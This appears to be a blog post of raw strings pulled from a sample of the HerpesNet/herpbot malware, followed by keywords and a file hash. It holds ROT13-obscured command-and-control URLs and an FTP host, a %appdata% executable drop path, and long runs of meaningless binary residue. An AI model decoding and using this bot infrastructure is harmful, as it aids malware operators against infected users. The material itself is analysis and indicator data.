ABCDEFGHIJKLMNOPQRSTUVWXYZ
[email protected]@@
00000
%appdata%
000000000.exe
tcerfhygy
uggc://qq.mrebkpbqr.arg/urecarg/
74978o6rpp6p19836n17n3p2pq0840o0
uggc://jjj.mrebkpbqr.arg/urecarg/
sgc.mrebkpbqr.arg
uggc://sex7.zvar.ah/urecarg/
[email protected]
hccvg
ujsdsdbbngfgjhhuugfgfujd
rffggghooo
Ashfurncsmx
%appdata%
00000
000000000.exe
[email protected]@@
[email protected]@@
[email protected]@@
[email protected]@@
[email protected]@@
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PA
[email protected]
1 [email protected]`1p1
2 [email protected]`2p2
3)3<3O3b3u3
4 4-4;4N4a4t4
525E5X5k5~5
616D6W6j6}6
707C7P7^7k7y7
8,8?8R8e8x8
9+9>9Q9^9l9
>->J>l>y>
?.?;?z?
0 0N0
515f5
6,6L6u6
7-7D7v7
848K8b8y8
:(:?:V:m:
:1;z=
= >Z>
>D?c?
161J1
383m3
4#4M4i4
545F5M5V5j5u5
6!6'6I6T6a6n6w6
7 7&7,7W7b7o7|7
8$8;8I8P8]8c8
8+9:9
:-:N:U:
;#;;;G;N;w;
<(<D<Z<y<
<0=?=`=e=k=r=
?2?F?^?x?
0(0.060<0D0J0R0X0l0
051X1w1
2'2/2=2K2Y2g2u2
3 3Z3}3
444<4Q4m4
4Z5}5
7"7/777E7
8!8C8]8
9+9G9e9n9{9
<'<2<
<.=8=B=~=
[email protected]
5.6f6
6j7x7
8%8L8z8
9/9=9C9S9Y9i9o9
: :r:
;:;S;g;n;
<@<G<M<
1n2x2
303B3P3v3
4)4?4P4
4#5N5
6D6f6
7Q8i8{8
9#9-959<9K9
<9=Q=Z=j=
>4>=>S>p>
0"0,0b0
1$1)141>1O1l1u1|1
2!2Y2q2
363O3Y3c3i3o3v3~3
9t9z9
:$:):2:`:g:l:s:z:
;$;+;D;R;`;k;r;
;7<e<{<
=4=R=o=
>.>5>F>V>z>
[email protected]?u?
0(0.030\0y0
0$1B1g1~1
1*2C2V2_2f2|2
2:3b3m3t3
5"5(515A5S5Z5
6F6l6w6
727K7
9)9O9m9t9x9|9
9R:]:x:
; ;$;(;,;v;|;
;Z<_<h<w<
0C1h1w1
2%2v2
2 343:[email protected]`3g3n3u3|3
4!4(4
7"7+777n7w7
8 8&8/868X8
959?9U9`9z9
:$:>:E:p:
;\<d<|<
=(=.=7===F=R=X=`=f=r=x=
=<>B>l>r>x>
>F?i?s?
0%0+02080?0E0M0T0Y0a0j0v0{0
1<1B1Z1v1
6'6[6f6p6
767I7
8"9.9A9S9n9v9~9
:F:W:k:
=%=6=o=
?B?^?
6%676~6
7-7^7{7
7e9r9{9
:P:[:e:v:
:A<R<Z<`<e<k<
<!=m=y=
=.>5>J>
> ?P?b?
 0,0<0_0l0x0
2/2F2T2Z2}2
474=4B4P4U4Z4_4o4
42575>5C5J5O5]5
5U6d6r6x6~6(7-7?7]7q7w7
9~:i>{>
?1?C?U?g?y?
:0l0
1 1$1(1,101z1
2$2(2,2M2w2
3 3$3(304=4V4t4
7m9G:
;H;^;
>$>+>:>F>S>w>
?'?K?z?
3.3T3
3G788
> >$>(>,>0>4>8>E>h>s>y>
?I?c?}?
1%2\2
2E3_3h3
4,5T5m5
6*686E6d6
9P:V:[:a:r:
=E=m=
>">&>,>0>6>:>?>E>I>O>S>Y>]>c>g>
;i<">5>
0<10282
3b4h4	5
9Z:`:n:
;!;[;
2"2&2*272
2!313N3
M1Z1h1
1&2A2j2
3D3q3
7)7-727
3$3(3,[email protected]
d1l1t1|1
9 9$9(9,9094989<[email protected]\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
[email protected]\1`1h1
2(282<2D2\2l2p2
3,303H3X3\3l3p3t3|3
4([email protected]|4
5 5,5H5T5p5
6,606P6l6p6
787X7x7
8P8`8t8
9$9,[email protected]`9l9
:$:D:L:T:\:d:l:x:
;<;D;L;T;\;d;l;t;
< <@<H<P<X<`<h<t<
=H=P=T=l=p=
0 [email protected]`0
6 6$6(6,6064686<[email protected]\6`6d6h6l6p6
7 7$7(7
;(;,;0;4;8;<;@;D;H;L;X;\;`;d;h;l;p;t;x;|;
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
3 3$3(3034383<[email protected]\3`3d3h3l3p3t3x3|3
9 9$9(9,9094989<[email protected]\9`9d9h9l9p9t9x9|9
: :(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:


Comments

blog comments powered by Disqus

Keywords: zeroxcode herpesnet herpbot herpnet frk7 db6779d497cb5e22697106e26eebfaa8